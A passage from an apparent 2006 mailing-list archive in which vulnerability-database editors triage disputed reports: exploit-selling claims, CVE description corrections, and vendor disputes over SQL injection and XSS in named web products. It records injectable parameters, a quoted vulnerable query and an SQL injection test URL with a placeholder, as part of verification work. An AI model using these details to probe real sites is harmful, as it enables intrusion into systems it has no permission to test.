I nobody has not reported on this criticality. Let all read > message on securityfocus.com. poc will possible be on sale only > narrow circle of the people from russian hacker So your exploit is not being reported to the vendors and you are going to sell this? http://archives.neohapsis.com/archives/bugtraq/2006-02/0104.html While we take all security reports seriously we have investigated this report and have been unable to find any sort of exploit suggested by the author. After contacting the author for more information the response we received was that a fee would have to be paid for more information. As a company we refuse to be coerced into paying a ransom given that the author has not been able to demonstrate that the vulnerability exists, much less a willingness to work with us to ensure a secure product for end users. http://archives.neohapsis.com/archives/bugtraq/2006-02/0221.html I sent him an email about his bugs and exploits. He asked me to add him in his ICQ. I told him I dont have and I gave him my msn and he added me. He asked me if I want the exploits I have to pay 500$. I said how and he gave me a site for transfring money. I told him I cant. I said if you want me to transfer money by paypal I will do.Then, he said yes. I told him do you have an account and he replied No. I opend an account for him, new account and gave him the password.He asked me to send money. I did :) I sent him 500$. Then he disappeared and he gave me nothing. He thinks he took 500$ :) He doesnt know anything and he is from russia and his langauge is broken. This is the result: We got a new king of rippers but this time by caiming that the have new exploits and they will sell it. From coley at linus.mitre.org Fri Feb 17 02:16:30 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 17 Feb 2006 02:16:30 -0500 (EST) Subject: [VIM] fake vulnerability extortion? In-Reply-To: References: Message-ID: I thought it was strange that this didn't result in a flood of commentary. A very interesting allegation. Does this fall under the category "Buyer beware?" - Steve From coley at linus.mitre.org Fri Feb 17 17:23:44 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 17 Feb 2006 17:23:44 -0500 (EST) Subject: [VIM] CVE-2006-0591 (crypt_blowfish) (fwd) Message-ID: The CVE description for crypt_blowfish originally had a couple inaccuracies in it, including claiming a remote attack vector. Solar Designer sent us the following email with corrections, and given that he mentioned trying to get this fixed in other vuln DBs, I thought I'd pass it on. - Steve ---------- Forwarded message ---------- Date: Sat, 18 Feb 2006 00:41:45 +0300 From: Solar Designer To: cve at mitre.org Subject: CVE-2006-0591 (crypt_blowfish) Hi, After trying to get this misinformation corrected in several vulnerability databases, I realized that it actually comes from CVE... The description says: "The crypt_gensalt functions for BSDI-style extended DES-based and FreeBSD-sytle MD5-based password hashes in crypt_blowfish 0.4.7 and earlier do not evenly and randomly distribute salts across the hash space, which makes it easier for remote attackers to guess passwords due to the increased number of collisions." The word "remote" is very wrong. One has to have a copy of the shadow password file (perhaps obtained via _another_ vulnerability) in order to exploit this. Also, the words "across the hash space" are wrong. Salts are not a part of the hash space. I suggest that you correct the description as follows: "The crypt_gensalt functions for BSDI-style extended DES-based and FreeBSD-style MD5-based password hashes in crypt_blowfish 0.4.7 and earlier do not evenly and randomly distribute salts, which makes it easier for attackers with a stolen copy of the password file to guess passwords due to the increased number of salt collisions." Thanks, -- /sd From jericho at attrition.org Fri Feb 17 18:04:14 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 17 Feb 2006 18:04:14 -0500 (EST) Subject: [VIM] Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability In-Reply-To: <20060216134720.19252.qmail@securityfocus.com> References: <20060216134720.19252.qmail@securityfocus.com> Message-ID: Hi Federico, Regarding your advisory: http://archives.neohapsis.com/archives/bugtraq/2006-02/0262.html http://archives.neohapsis.com/archives/bugtraq/2006-02/0274.html : Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability : Information of Software: : : Software: Siteframe Beaumont 5.0.1a Can you confirm which version you tested, 5.0.1a or 5.0.2? Brian OSVDB.org From coley at mitre.org Fri Feb 17 20:05:55 2006 From: coley at mitre.org (Steven M. Christey) Date: Fri, 17 Feb 2006 20:05:55 -0500 (EST) Subject: [VIM] Codebase relationships between My Blog and M. Blom HTML::BBCode Message-ID: <200602180105.k1I15tAo022570@cairo.mitre.org> FYI. I ran into this accidentally while reviewing some alex at evuln advisories. He linked 2 distinct issues to the same CVE, and it turns out he was right, based on CVE's content decisions. In short: the M. Blom HTML::BBCode product produces a "BBCode.pm" that is included in My Blog, and maybe other products too. The "BBCode.pm" from a fixed My Blog, and a fixed HTML::BBCode, is exactly the same. Since CVE merges issues if they share the same codebase, these 2 products were merged into a single CVE. See below. - Steve ====================================================== Name: CVE-2006-0735 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0735 Announced: 20060213 Flaw: XSS Reference: BUGTRAQ:20060215 [eVuln] My Blog BBCode XSS Vulnerabilities Reference: URL:http://www.securityfocus.com/archive/1/archive/1/425087/100/0/threaded Reference: MISC:http://evuln.com/vulns/79/summary.html Reference: BUGTRAQ:20060215 [eVuln] M. Blom HTML::BBCode perl module XSS Vulnerabilities Reference: URL:http://www.securityfocus.com/archive/1/archive/1/425113/100/0/threaded Reference: MISC:http://www.evuln.com/vulns/80/summary.html Reference: CONFIRM:http://menno.b10m.net/perl/HTML-BBCode/Changes Reference: CONFIRM:http://menno.b10m.net/perl/dists/HTML-BBCode-1.05.tar.gz Reference: CONFIRM:http://fuzzymonkey.net/forum/viewtopic.php?t=856 Reference: BID:16659 Reference: URL:http://www.securityfocus.com/bid/16659 Cross-site scripting (XSS) vulnerability in BBcode.pm in M. Blom HTML::BBCode 1.04 and earlier, as used in products such as My Blog before 1.65, allows remote attackers to inject arbitray Javascript via a javascript URI in an (1) img or (2) url BBcode tag. Analysis: ABSTRACTION: Blom HTML::BBCode is created as a library, and this library is clearly used by My Blog, so CD:SF-CODEBASE applies. ACKNOWLEDGEMENT: Blom HTML::BBCode changelog says "1.05 ... Fixed XSS bug (Tiket [sic] 17633, 'HTML::BBCode XSS Vulnerabilities') ... Thanks to Alex for reporting." The e-mail for Aliaksandr Hartsuyeu is alex at evuln and thus there are mutual references. ACKNOWLEDGEMENT: My Blog vendor forum post, dated 20060214, says "New release today. Fixed XXS vulnerability". This aligns with evuln's claims. Also, a source code analysis shows an exact copy of BBCode.pm in My Blog as in the fixed version of HTML::BBCode 1.05. From sullo at cirt.net Sat Feb 18 12:22:48 2006 From: sullo at cirt.net (Sullo) Date: Sat, 18 Feb 2006 12:22:48 -0500 Subject: [VIM] [Fwd: Geeklog search.php Failed SQL Query Path Disclosure] Message-ID: <43F757E8.9020108@cirt.net> OSVDB-21398 CVE-2005-4026 -------- Original Message -------- Hi, on , you have the following statement: --- snip --- Geeklog contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search.php script not properly sanitizing user-supplied input to the datestart and dateend variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. [...] Currently, there are no known upgrades, patches, or workarounds available to correct this issue. --- snip --- This information is not correct. It was NOT possible to perform an SQL injection. Malformed "date" fields only caused a PHP warning message to be displayed that would disclose the path in which Geeklog is installed on the server. This issue was resolved with the release of Geeklog 1.3.11sr3 on 2005-12-12 and 1.4.0rc1 on 2005-12-31. Also see Please update your advisory accordingly. Thank you. regards, Dirk Haun (for the Geeklog Team) -- http://www.geeklog.net/ http://geeklog.info/ -- http://www.cirt.net/ | http://www.osvdb.org/ From coley at linus.mitre.org Sat Feb 18 18:37:47 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Sat, 18 Feb 2006 18:37:47 -0500 (EST) Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd) In-Reply-To: References: Message-ID: I just ran across this in CVE. He's changed his page so that it only mentions show.php, but the text still mentions $date. I can confirm seeing the same code as the OSVDB mangler, but I saw it in the .php extension downloads (there is one set of downloads with .php3 and another with .php). The exploit countdown is down to 2 days, so maybe we'll get more info then :) - Steve From coley at linus.mitre.org Sat Feb 18 18:39:17 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Sat, 18 Feb 2006 18:39:17 -0500 (EST) Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd) In-Reply-To: References: Message-ID: *sigh* correction: in the downloaded version I have, the file is called "date.php", with "date" instead of "data", as the original mangler said. - Steve From jericho at attrition.org Sat Feb 18 20:35:12 2006 From: jericho at attrition.org (security curmudgeon) Date: Sat, 18 Feb 2006 20:35:12 -0500 (EST) Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd) Message-ID: Sorry Steven, I thought I had sent this to the list. I have 23186 (covers date.php) locked until I see what other databases do. If enough keep entries, I will keep it and myth/fake flag it. ---------- Forwarded message ---------- From: Josh Zlatin To: jericho at attrition.org Date: Wed, 15 Feb 2006 09:32:14 -0500 (EST) Subject: Re: EV0074 BirthSys 3.1 SQL injection (fwd) Well I guess you can remove osvdb #23186. -- - Josh ---------- Forwarded message ---------- Date: Wed, 15 Feb 2006 16:30:24 +0300 From: Support - eVuln.com To: Josh Zlatin Subject: Re: EV0074 BirthSys 3.1 SQL injection You are right. SQL Injection exists only in "show.php" date.php is not vulnerable. Thanks! Aliaksandr Hartsuyeu http://evuln.com > I wanted to clarify the SQL injection in the data.php3 file in BirthSys > 3.1 that you reported. I was unable to recreate the SQL injection via > either the 'date' or 'month' variables as both are those are set in the > date.php3 code itself: > > Quoted from BirthSys data.php3: > $date = date( "d" ); > $month=("$monthName[$currentMonth]"); > > The only SQL query in that script is: > $result = mysql_query("SELECT * FROM birthsys WHERE month= $month AND > day= $date"); > > so am I missing something or is this a mistake? > > Thanks, > > -- > - Josh > From smoore at securityglobal.net Mon Feb 20 00:58:24 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Mon, 20 Feb 2006 00:58:24 -0500 Subject: [VIM] vendor dispute for CVE-2006-0669 Message-ID: <43F95A80.60906@securityglobal.net> Hi, Regarding CVE-2006-0669 and SecurityTracker 1015600, the vendor disputes the SQL injection claim and indicates that GA Forum Light does not use an SQL database (it uses flat files). I looked through the code and the behavior that was originally reported by Dj_Eyes From Crouz Security Team appears to be a vbscript parsing error instead of an SQL injection problem. We've just written to Dj_Eyes for additional information, but I'm pretty sure we'll be able to close this out as an incorrect report. Stuart -- Stuart Moore SecurityTracker.com SecurityGlobal.net LLC smoore at securityglobal.net +1 301 495 5930 voice +1 413 691 4346 fax From coley at linus.mitre.org Mon Feb 20 14:25:54 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 20 Feb 2006 14:25:54 -0500 (EST) Subject: [VIM] [Fwd: Geeklog search.php Failed SQL Query Path Disclosure] In-Reply-To: <43F757E8.9020108@cirt.net> References: <43F757E8.9020108@cirt.net> Message-ID: Notice this: > Also see It addresses TWO vulns, not just the original r0t one. Associated CVE is below. - Steve ====================================================== Name: CVE-2005-4725 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4725 Reference: MISC:http://www.geeklog.net/forum/viewtopic.php?showtopic=61457 Reference: CONFIRM:http://www.geeklog.net/article.php/geeklog-1.3.11sr3 Geeklog before 1.3.11sr3 allows remote attackers to bypass intended access restrictions and comment on an arbitrary story or topic by guessing the story ID. From jericho at attrition.org Tue Feb 21 13:45:36 2006 From: jericho at attrition.org (security curmudgeon) Date: Tue, 21 Feb 2006 13:45:36 -0500 (EST) Subject: [VIM] oh how i love xerox Message-ID: As usual, the advisory is vague and repetitive.. every few months, same thing with a new ID number =) This time, look at the wording regarding XSS. So is this something worse than XSS, or do they not quite get it? http://www.xerox.com/downloads/usa/en/c/cert_XRX06_001.pdf - Cross-site scripting allowing contents of web pages to be modified in an unauthorized manner From coley at linus.mitre.org Wed Feb 22 01:31:24 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 22 Feb 2006 01:31:24 -0500 (EST) Subject: [VIM] oh how i love xerox In-Reply-To: References: Message-ID: On Tue, 21 Feb 2006, security curmudgeon wrote: > As usual, the advisory is vague and repetitive.. every few months, same > thing with a new ID number =) This time, look at the wording regarding > XSS. So is this something worse than XSS, or do they not quite get it? >... > > - Cross-site scripting allowing contents of web pages to be modified in an > unauthorized manner Change "XSS" to "HTML injection" and it makes sense. Stick in a redirect or set the text color to the same as the background color and it makes sense. Actually, recently I ran across some recent vendor forum for an acknowledgement of an issue, where the initial discovery of the issue happened when a customer was suffering from a redirect XSS attack. Not that I personally like to use the terminological distinctions between XSS and HTML injection and "script insertion" (?) when from a VDB perspective, 75% of the time you don't know which variant it is in the first place :) - Steve From coley at mitre.org Wed Feb 22 20:34:15 2006 From: coley at mitre.org (Steven M. Christey) Date: Wed, 22 Feb 2006 20:34:15 -0500 (EST) Subject: [VIM] FYI - Internet Explorer phishing issue Message-ID: <200602230134.k1N1YFg5011301@cairo.mitre.org> Regarding the recent IE phishing issue that seemed to be the same as an earlier discovery... Based on my research, there are slight differences. Whether those diff's are relevant to VDB's will vary by editorial policy :) I just sent this to Bugtraq. - Steve BUGTRAQ:20060218 Re: Internet Explorer Phishing mouseover issue URL:http://www.securityfocus.com/archive/1/archive/1/425386/100/0/threaded The "http-equiv" and "Gandalf" examples are very similar, but I think there might be some important distinctions. 1) The http-equiv example (CVE-2004-1104) uses a BASE tag with an href attribute. In the form, the A tag has an "href=" without a value. The value of the BASE HREF is displayed on the status bar when the user does a mouseover. 2) The Gandalf example (CVE-2006-0799) does not have a base href at all. But the A HREF has a value. The value of the A href is displayed on the status bar when the user does a mouseover. 3) If you use a hybrid of the two previous examples, in which both BASE and A tags specify an href, then the A HREF is displayed on the status bar when the user does a mouseover. NOTE that the following difference does not seem to have an impact: 4) the http-equiv example has the A tag outside of the form, but the Gandalf example has the A tag inside the form. Switching these around doesn't seem to affect what gets displayed. Both examples have the same problem in which the form's "action" step is not displayed in the status bar, but as we see above, there are two separate vectors with slightly different results. This was tested in IE 6.0.2900.2180 on XP. - Steve From jericho at attrition.org Thu Feb 23 12:53:17 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 23 Feb 2006 12:53:17 -0500 (EST) Subject: [VIM] fun vulnerability timelines Message-ID: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0525.html Disclosure Timeline: 2003-08.??: Vulnerabilities found. 2003-08.??: 1st vendor contact. (didn't responded) 2005-09.30: 2nd vendor contact. (didn't responded) 2005-10.03: 3rd vendor contact. (didn't responded) 2005-10.08: Deleted free download page in vendor (Ooops). 2006-02.17: 4th verdon contact. (didn't responded) 2006-02.22: Public disclosure. From coley at mitre.org Thu Feb 23 17:52:15 2006 From: coley at mitre.org (Steven M. Christey) Date: Thu, 23 Feb 2006 17:52:15 -0500 (EST) Subject: [VIM] Mini-Nuke? Message-ID: <200602232252.k1NMqFVZ020286@cairo.mitre.org> I vaguely remember this being a topic of discussion before. Any information on what/where "Mini-Nuke" is? It seems to trace back to http://www.miniex.net, but the site is in Turkish or some other non-Romance language. I've navigated around it a little bit and can't seem to find a download page. - Steve From jericho at attrition.org Thu Feb 23 18:06:33 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 23 Feb 2006 18:06:33 -0500 (EST) Subject: [VIM] Mini-Nuke? In-Reply-To: <200602232252.k1NMqFVZ020286@cairo.mitre.org> References: <200602232252.k1NMqFVZ020286@cairo.mitre.org> Message-ID: : I vaguely remember this being a topic of discussion before. : : Any information on what/where "Mini-Nuke" is? It seems to trace back to : http://www.miniex.net, but the site is in Turkish or some other : non-Romance language. I've navigated around it a little bit and can't : seem to find a download page. I have that as the vendor from previous discussion or digging for the two issues published 2006-01-12. Or maybe I got it from Secunia, which I noticed now shows a 3rd issue. http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html http://secunia.com/advisories/18439/ From jericho at attrition.org Thu Feb 23 18:07:35 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 23 Feb 2006 18:07:35 -0500 (EST) Subject: [VIM] Mini-Nuke? In-Reply-To: References: <200602232252.k1NMqFVZ020286@cairo.mitre.org> Message-ID: : : I vaguely remember this being a topic of discussion before. : : : : Any information on what/where "Mini-Nuke" is? It seems to trace back to : : http://www.miniex.net, but the site is in Turkish or some other : : non-Romance language. I've navigated around it a little bit and can't : : seem to find a download page. : : I have that as the vendor from previous discussion or digging for the two : issues published 2006-01-12. Or maybe I got it from Secunia, which I : noticed now shows a 3rd issue. : : http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html : : http://secunia.com/advisories/18439/ http://www.nukedx.com/?viewdoc=7 Firma: MiniNuke (www.miniex.net) (www.mini-nuke.info) From coley at mitre.org Thu Feb 23 21:02:40 2006 From: coley at mitre.org (Steven M. Christey) Date: Thu, 23 Feb 2006 21:02:40 -0500 (EST) Subject: [VIM] old Squid clientAbortBody issue - NOT an overflow? Message-ID: <200602240202.k1O22eK1021618@cairo.mitre.org> There's an old Squid clientAbortBody issue that was claimed to be a buffer overflow, but the original report seems to be erroneous. Refs: MISC:http://www.securitylab.ru/47881.html OSVDB:9801 SECTRACK:1011214 These sources claim a buffer overflow in clientAbortBody() in client_side.c in Squid before 2.6 STABLE6 (actually, some say STABLE5, which is understandable because the original researcher claims both.) The key here is the following Squid bug report: MISC:http://www.squid-cache.org/bugs/show_bug.cgi?id=972 Here is my reconstruction of what happened: (1) Original bug report to vendor shows null dereference in clientAbortBody; original claim is null deref, and patch shows null deref. (2) Separate researcher claims overflow in clientAbortBody() for STABLE6 (SECTRACK:1011214), saying "I am still experiencing this problem in STABLE6." (3) Various vuln DBs reported this issue as an overflow (including OSVDB:9801). (4) Later in the bug report, the vendor asks the researcher for more information about the STABLE6 problem. (5) The researcher then retracts the original claim, saying "the release I thought was STABLE6 was a mis-labled version of Stable5..." I'll be creating a CVE for the issue, calling it a null dereference in STABLE5. Not sure where the "overflow" claim even came from, but there might be some long fields in the stack trace in message 2 of the bug report (or maybe it's just zeroed memory). FYI, SECUNIA:12508 is based on the original clientAbortBody null dereference report. - Steve P.S. Why yes, figuring this out DID kinda suck. From coley at mitre.org Fri Feb 24 16:51:00 2006 From: coley at mitre.org (Steven M. Christey) Date: Fri, 24 Feb 2006 16:51:00 -0500 (EST) Subject: [VIM] SUSE-SA:2006:010 - dual use Message-ID: <200602242151.k1OLp09i000380@cairo.mitre.org> FYI, there appear to be 2 different versions of SUSE-SA:2006:010 out there. One is for CASA: http://www.novell.com/linux/security/advisories/2006_10_casa.html But the Bugtraq post was for Heimdal: http://www.securityfocus.com/archive/1/archive/1/425979/100/0/threaded I have an inquiry into SUSE to find out what's up. - Steve From coley at linus.mitre.org Mon Feb 27 16:58:16 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 27 Feb 2006 16:58:16 -0500 (EST) Subject: [VIM] Vendor ACK - CVE-2005-2776 & CVE-2005-2777 update (right link) (fwd) Message-ID: ---------- Forwarded message ---------- Date: Mon, 27 Feb 2006 20:25:58 +0100 (CET) From: LookingGlass To: cve at mitre.org Subject: CVE-2005-2776 & CVE-2005-2777 update (right link) Hi, I just found out that one of my old tools has some vulnerabilities. An updated version is at my site, check out: (update with right link) http://de-neef.net/articles.php?id=2&page=2 update: Sun Feb 12 21:32:51 CET 2006 fixed an arbitrary command execution in the DNS Lookup argument. Note that in order to avoid Cross Site Scripting you need to run with "register_globals=off" (as anybody should anyway). Added ipv4 only functionality, check form.php, and follow comments inline. Could you please update the CVE's? Grtz, Nf. -- From coley at mitre.org Mon Feb 27 17:42:06 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 27 Feb 2006 17:42:06 -0500 (EST) Subject: [VIM] Vendor clarification on CVE-2006-0732 (SAP Business Connector) Message-ID: <200602272242.k1RMg6s7029284@cairo.mitre.org> CVE was contacted by a representative of webMethods regarding CVE-2006-0732. As of 2006/02/27, details of the problem are not available due to researcher's delayed disclosure. However, the webMethods representative wanted to provide some additional clarification. Since they do not go through public channels like Bugtraq, they reviewed and agreed with my following summary of their comments: SAP Business Connector is an OEM version of webMethods Integration Server. webMethods states that this issue can only occur when the product is installed as root/admin, and if the attacker has access to a general purpose port; however, both are discouraged in the documentation. In addition, the attacker must already have acquired administrative privileges through other means. - Steve ====================================================== Name: CVE-2006-0732 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0732 Reference: BUGTRAQ:20060215 CYBSEC - Security Pre-Advisory: Arbitrary File Read/Delete in SAPBC Reference: URL:http://www.securityfocus.com/archive/1/archive/1/425048/100/0/threaded Reference: MISC:http://www.cybsec.com/vuln/CYBSEC_Security_Pre-Advisory_Arbitrary_File_Read_or_Delete_in_SAP_BC.pdf Reference: BID:16668 Reference: URL:http://www.securityfocus.com/bid/16668 Reference: FRSIRT:ADV-2006-0611 Reference: URL:http://www.frsirt.com/english/advisories/2006/0611 Reference: SECTRACK:1015639 Reference: URL:http://securitytracker.com/id?1015639 Reference: SECUNIA:18880 Reference: URL:http://secunia.com/advisories/18880 Unspecified vulnerability in SAP Business Connector 4.6 and 4.7 allows remote attackers to read or delete arbitrary files via unspecified vectors. NOTE: This information is based upon a vague initial disclosure. Details will be updated after the grace period has ended. NOTE: SAP Business Connector is an OEM version of webMethods Integration Server. webMethods states that this issue can only occur when the product is installed as root/admin, and if the attacker has access to a general purpose port; however, both are discouraged in the documentation. In addition, the attacker must already have acquired administrative privileges through other means. From coley at mitre.org Mon Feb 27 20:26:30 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 27 Feb 2006 20:26:30 -0500 (EST) Subject: [VIM] Vendor dispute - CVE-2005-4486 - Quantum Art QP7.Enterprise Message-ID: <200602280126.k1S1QU0W000252@cairo.mitre.org> Source Ref: http://pridels.blogspot.com/2005/12/qp7enterprise-sql-vuln.html (r0t: the gift that keeps on giving) The vendor, Quantum Art, notified CVE (through NVD) that "neither p_news_id, news_and_events_new.asp not news.asp are not the part of our product, but the ASP pages that possible were created on the base of our product." At the vendor's implicit request for proof, I examined the vendor's public web site. A demo page was not available, but the main site had the reported URLs. So, r0t's original report might have come from testing the live site. I performed a cursory, non-invasive analysis of the URLs originally reported by r0t. news_and_events_new.asp generated various invalid SQL syntax errors based on some common manipulations of the p_news_id parameter, although "5'" did not work as might have been suggested by r0t. I did not see anything in news.asp. I'm waiting for the vendor's response, but at this point I'm marking it as disputed with insufficient proof either way. - Steve ====================================================== Name: CVE-2005-4486 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4486 Reference: MISC:http://pridels.blogspot.com/2005/12/qp7enterprise-sql-vuln.html Reference: BID:16022 Reference: URL:http://www.securityfocus.com/bid/16022 ** DISPUTED ** SQL injection vulnerability in Quantum Art QP7.Enterprise (formerly Q-Publishing) allows remote attackers to execute arbitrary SQL commands via the p_news_id parameter to (1) news_and_events_new.asp and (2) news.asp. NOTE: on 20060227, the vendor disputed the accuracy of this report, saying that the p_news_id, news_and_events_new.asp, and news.asp are not specifically part of their product, although they could be dynamically generated through use of the product. Some investigation by CVE suggests evidence that the news_and_events_new.asp page has at least a forced invalid SQL syntax error, but this could not be repeated for news.asp. From coley at mitre.org Tue Feb 28 20:28:43 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 28 Feb 2006 20:28:43 -0500 (EST) Subject: [VIM] ArGoSoft FTP server remote heap overflow Message-ID: <200603010128.k211Shvm004614@cairo.mitre.org> [sent the following to Bugtraq] ======================================= A buffer overflow in DELE was originally reported to Bugtraq by CorryL in March 2005, for ArGoSoft FTP 1.4.2.8 (CVE-2005-0696): http://www.securityfocus.com/archive/1/392653 According to CorryL's disclosure timeline, no patch had been released by the disclosure date. So, is this a rediscovery of that older issue, for the most recent version? - Steve From coley at mitre.org Tue Feb 28 20:48:41 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 28 Feb 2006 20:48:41 -0500 (EST) Subject: [VIM] PwsPHP ugly mess Message-ID: <200603010148.k211mfFj004745@cairo.mitre.org> I'm drained by the whole experience, so I'll let CVE's internal analysis fields speak for themselves. Summary: multiple PwsPHP issues seem to have been disclosed and munged together under one roof. This appears to stem from multiple grep-and-gripe reports by papipsycho, but this cannot be proven due to non-public raw source information in the associated BID, which seems to combine 2 separate issues, although one of them doesn't seem to have an obvious attack vector based on casual source inspection. Hooray for the provenance problem! Why oh why did I dare to ask myself the wrong question at the wrong time? :) - Steve P.S. On the post-proactive vendor front, looks like the vendor is asking for security auditors for PwsPHP : http://www.pwsphp.com/index.php?mod=news&ac=commentaires&id=280 ====================================================== Name: CVE-2006-0668 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0668 Announced: 20060209 Flaw: sql-inject Reference: MISC:http://www.securityfocus.com/bid/16567/exploit Reference: BID:16567 Reference: URL:http://www.securityfocus.com/bid/16567 Reference: SECUNIA:19023 Reference: URL:http://secunia.com/advisories/19023 SQL injection vulnerability in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter, possibly in message.php in the espace_membre module. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. Analysis: ACCURACY: the exploit tab in BID:16567 includes the demonstration URL "index.php?mod=espace_membre&ac=message&id=999999[SQL]". Source code inspection shows that index.php uses the "mod" and "ac" parameters to construct an include statement for modules/espace_membre/message.php. The use of an 'id' parameter could not be found using casual inspection. ACCURACY: the fully functioning exploit code that is linked in BID:16567 is for profil.php/aff_news_form, which appears to be a different vulnerability. ====================================================== Name: CVE-2006-0942 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0942 Announced: 20060209 Flaw: sql-inject Reference: MISC:http://downloads.securityfocus.com/vulnerabilities/exploits/PwsPHP_SQL_Inj.php Reference: BID:16567 Reference: URL:http://www.securityfocus.com/bid/16567 SQL injection vulnerability in profil.php in PwsPHP 1.2.3, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the aff_news_form parameter, a different vulnerability than CVE-2005-1509. Analysis: ACCURACY: the exploit tab in BID:16567 includes an example URL that seems to involve espace_membre, but that may be for a different issue. The actual functioning program included in BID:16567 is for this profil.php/aff_news_form issue. ACCURACY: A source code review of profil.php in 1.2.3 shows the use of aff_news_form in an input form, but the input has a maximum length specifier, possibly indicating attempts at client-side restrictions;. On resubmission to the same profile.php, $aff_news_form is directly inserted into an SQL query, as called by the reqmysql function, which primarily calls mysql_query(). ====================================================== Name: CVE-2006-0943 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0943 Announced: 20060209 Flaw: sql-inject Reference: BUGTRAQ:20060225 PwsPHP Injection SQL on Index.php Reference: URL:http://www.securityfocus.com/archive/1/archive/1/426084/100/0/threaded Reference: BUGTRAQ:20060226 Re: PwsPHP Injection SQL on Index.php Reference: URL:http://www.securityfocus.com/archive/1/archive/1/426183/100/0/threaded Reference: MISC:http://www.pwsphp.com/index.php?mod=news&ac=commentaires&id=278 SQL injection vulnerability in the sondages module in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php. Analysis: ACKNOWLEDGEMENT: The PwsPHP forum with the fix is in another language, but source inspection of the suggested patch shows that modules/sondages/index.php was fixed on Feb 27 (2 days after disclosure) and cleanses the id parameter using intval(). From coley at linus.mitre.org Tue Feb 28 22:00:25 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 28 Feb 2006 22:00:25 -0500 (EST) Subject: [VIM] Concurrence with vendor dispute - LiteCommerce SQL injection Message-ID: I see that some vuln DBs have deleted their entries for the claimed LiteCommerce SQL injection issue by Diabolic Crab. After some more prompting from the vendor, I've looked into the problem some more. My investigations were, by necessity, minimal since I do not have the product. With those restrictions, I was unable to verify Diabolic Crab's claims, beyond triggering a SQL syntax error that did not include path disclosure or any system-specific information leak. With that, I've decided to treat CVE-2005-1032 as an issue to be slated for a "REJECT". Note that Secunia pointed to a news item titled "LITECOMMERCE SECURITY BULLETIN #20050411" which seems to give a public explanation from the vendor: http://www.litecommerce.com/news.html Note - during my investigations, I ran across http://www.securiteam.com/unixfocus/5TP0E0KFFA.html , which has an alternate angle that smells like eval injection or something similar. - Steve ---------- Forwarded message ---------- Date: Tue, 28 Feb 2006 21:49:34 -0500 (EST) From: Steven M. Christey To: Litecommerce Sales Cc: cve at mitre.org Subject: Re: CVE-2005-1032 Hello, I have investigated this issue a little further, and it does appear that while your product might generate SQL syntax errors that reveal portions of the underlying database fields and tables, it does not leak sensitive information related to the actual system. Therefore this does not satisfy CVE's definition of a vulnerability or an exposure. The CVE description has been modified as below. I have weakened the description and emphasized that the researcher's original claims could not be verified. Regards, Steve Christey CVE Editor ====================================================== Name: CVE-2005-1032 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1032 Reference: BUGTRAQ:20050406 LiteCommerce Sql injection and reveling errors vulnerability Reference: URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111281524405632&w=2 Reference: MISC:http://digitalparadox.org/advisories/lico.txt Reference: BID:13044 Reference: URL:http://www.securityfocus.com/bid/13044 Reference: OSVDB:15314 Reference: URL:http://www.osvdb.org/15314 Reference: SECUNIA:14857 Reference: URL:http://secunia.com/advisories/14857 Reference: XF:litecommerce-cart-sql-injection(19998) Reference: URL:http://xforce.iss.net/xforce/xfdb/19998 ** REJECT ** cart.php in LiteCommerce might allow remote attackers to obtain sensitive information via invalid (1) category_id or (2) product_id parameters. NOTE: this issue was originally claimed to be due to SQL injection, but the original researcher is known to be frequently inaccurate with respect to bug type and severity. The vendor has disputed this issue, saying "These reports are credited to malicious person we refused to hire. We have not taken legal action against him only because he is located in India. The vulnerabilites reported can not be reproduced, hence information you provide is contrary to fact." Further investigation by CVE personnel shows that an invalid SQL syntax error could be generated, but it only reveals portions of underlying database structure, and it does not appear to lead to path disclosure. Therefore, this issue is not a vulnerability or an exposure, and it probably should be REJECTED. From jericho at attrition.org Tue Feb 28 23:55:14 2006 From: jericho at attrition.org (security curmudgeon) Date: Tue, 28 Feb 2006 23:55:14 -0500 (EST) Subject: [VIM] Knowledgebases Remote Command Exucetion In-Reply-To: <20060227123040.18672.qmail@securityfocus.com> References: <20060227123040.18672.qmail@securityfocus.com> Message-ID: : http://www.activecampaign.com/support/ : : Version : 